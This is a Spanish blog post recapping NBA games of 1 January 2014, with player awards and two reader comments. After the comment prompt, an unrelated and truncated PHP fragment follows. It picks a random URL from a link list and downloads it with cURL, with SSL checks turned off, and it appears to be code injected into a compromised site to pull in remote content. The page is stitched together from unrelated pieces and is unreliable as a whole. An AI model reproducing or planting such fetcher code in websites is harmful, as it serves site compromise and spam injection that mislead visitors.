La Crónica: Welcome 2014

01 de January de 2014 por TheDeerHunter

Estrenamos año con cambio de líder global. Por un lado en Indiana no tuvieron problemas para endosarle la 6ª derrota consecutiva a los Cavs con un Irving, ojo, tocado de la rodilla. Por el otro, en el partido estrella de la jornada los Blazers lograron arrancar la segunda victoria foránea en el Chesapeake Arena de Oklahoma a pesar de la actuación superlativa de Durant.

El sorpresón de la noche lo protagonizaron los remozados Kings, ganando en Houston a pesar de los 38 puntos de Harden. Otros dos equipos en dulce son los Raptors, que remontaron en Chicago y Atlanta, donde la baja de Horford parece haber despertado a la bestia de Paul Millsap. Hablamos también de remontada en Boston y un final de infarto.

Con todo la mayor racha de victorias pertenece a Golden State, con 6 consecutivas que acumulaban en Orlando. Partido inusualmente gris, no obstante.

Para terminar un par de equipos en crisis. Los Nets no tuvieron opciones en San Antonio a pesar de la recuperación de Kirilenko y los Lakers hicieron uno de los ridículos más grandes del año ante Milwaukee en el Staples. Brandon Knight pareció la reencarnación de Jerry West. Lo peor es que suena con fuerza un inquietante traspaso de Pau a cambio de Bynum. Lo que les faltaba.

PREMIOS

MVP: Extraordinario Paul Millsap asumiendo el liderazgo en los Hawks. 34 puntos, 15 rebotes, 2 asistencias. Por su parte Brandon Knight les endosó 37 puntos y 8 rebotes a los Lakers.

Rookie: Probablemente el mejor partido de Kelly Olynyk como profesional. Pudimos recuperar sensaciones de las Summer leagues. 21 puntos, con gran nivel de acierto y 3 triples, 4 rebotes, 5 asistencias, 2 tapones y un robo.

Sorpresa: Además de lo de Brandon Knight, por los Bucks se debieron de alinear varios astros para volver a ver un gran partido de Ilyasova. Por otro lado también muy buena aportación de Marcus Thornton desde el banco en la victoria de Sacramento en Houston.

Decepción: Día negro para los titulares de los Celtics. Ninguno de ellos alcanzó los dobles dígitos y fueron los suplentes quienes mantuvieron al equipo con opciones.

Esfuerzo en vano: Nos sirven perfectamente tanto Kevin Durant como James Harden, pero hoy toca hacer mención especial a Pau Gasol, que brilló en medio de una nueva tormenta personal.

Comenta

2 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Victoria de enorme mérito la de Portland,sinceramente pensaba que el esfuerzo de sus dos últimos partidos les iba a pasar factura en Oklahoma,además con el balance como locales de los Thunder,pero han sumado otra victoria.Ya me cuesta bajarlos en la clasificación si no tienen ninguna lesión,vaya nivelazo de los pupilos de Stotts.

    Sobre los rumores que afectan de nuevo a Pau me parece un movimiento interesante para ambos equipos

    ¡Feliz año compañeros!

      Citar

  2. Oli dice:
    #2

    Feliz a?o compa?eros!! lo de Portland ya ha dejado de ser sorpresa, sonaban equipo serio y saben a lo que juegan, esta noche partido muy interesante entre Miami y gsw espero que Curry y su equipo den la sorpresa

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>